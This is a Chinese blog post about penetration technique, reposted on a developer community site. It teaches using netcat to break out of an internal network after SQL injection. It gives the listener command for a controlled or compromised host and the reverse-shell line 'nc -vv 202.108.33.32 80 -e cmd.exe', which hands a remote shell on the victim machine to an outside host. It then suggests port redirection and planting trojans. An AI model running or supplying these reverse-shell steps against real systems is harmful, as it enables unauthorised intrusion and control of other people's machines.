开发者社区> 科技小能手> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

nc命令小材大用

简介:
+关注继续查看


nc命令小材大用

simeon
通过本文你可以学到:
1SQL注入内网渗透的一种思路
2nc命令的一种好用法
   内网渗透对于网络安全爱好者,特别是网络入侵检测时无疑是一种疼,很多时候我们遇到这种情况只有采取放弃,其实不然,完全使用另外一种方法来进行突破。很多人多知道nc号称瑞士军刀,是一款非常不错的网络安全工具,其强大的功能毫不逊于一款远程控制软件,只是我们没有挖掘其强大的功能而已。本文只是探讨如何来进行内网突破的思维。下面讲讲本文对nc的具体用法。
(一)在控制端监听端口
这个控制端可以是自己的肉鸡,可以是在具有独立IP的网络计算机上,一定要具有独立IP,否则无法反弹到该IP地址。使用命令如下:
Nc –vv –l –p port 例如 nc –vv –l –p 80
在控制端监听端口时,需要注意的是,需要先使用“netstat -an”查看网络端口的开放情况(图1),选择一个未监听的端口,一般选择804434461102523端口为好,当然其他未用端口也可以。
使用netstat –an 查看端口开情况
说明:如果控制端已经开放了我们要监听的端口,那么我们使用nc监听该端口不会成功,nc程序会提示错误信息,如果监听正常,会显示“Listening on  [any] 80 …….”字样(图2)。
在控制端监听80端口
(二)在内网计算机开放端口
      在内网计算机上运行“nc –vv ipaddress port –e cmd.exe”,这里的IPaddress一定是控制端的ip地址,例如控制端的地址为“202.108.33.32,且80端口未开放,则在内网计算机上运行“nc –vv -202.108.33.32 80 –e cmd.exe”即可。如果一切正常,则会反弹一个dosshell回来,跟cmd命令的运行界面差不多,就象在本机的DOS下操作一样,非常好用,可以粘贴命令,直接执行命令等(图3)。使用“net user”命令,可以看到我的账号“simeon”在其中。
反弹shell成功
(三)其它运用
本文介绍的是如何使用nc来反弹内网的shell,在sql注入的过程中,很多时候遇到独立主机是内网IP,及时主机开放了3389也无法连接进去,这个时候,一个真正的dosshell就特别重要,通过网页执行nc命令,提供该内网一个shell,然后执行lcx端口重定向或者执行反弹木马或者其他命令,无疑是一个很好的解决方法。
(四)结束语
    本文就技术难度来说,并不是很大,nc这个软件很多朋友都熟悉,可以这么说,搞网络安全的没有不熟悉nc这个软件的,但是对于nc命令的很多用法,不一定熟悉。想不起来曾经看过的一部电影,其中有这么一段话,高手就是将一个复杂的动作做到单一和简单!这跟真正的武林高手一样,不一定需要太多招式,一刀一剑就可以致命取胜。网络安全也是如此,对一个工具要熟能生巧,举一反三,才能出现更多的用法,更多的新的idea,期待大家新的发现。


 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/38498

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
【工具】nc使用详解
本文将详细讲解nc使用以及相关网络知识,适合初学者
0 0
nc
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。
827 0
lsof,nc
安装nc,   yum -y install nc; 用nc传输同步文件 A,被同步端-即需要备份复制端;  tar -czvf - /|nc 192.168.1.204(同步机ip,复制文件位置机) 8888(同步监听端口); B,同步端-即备份文件存放处;  nc -l 8888|t...
468 0
文章
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载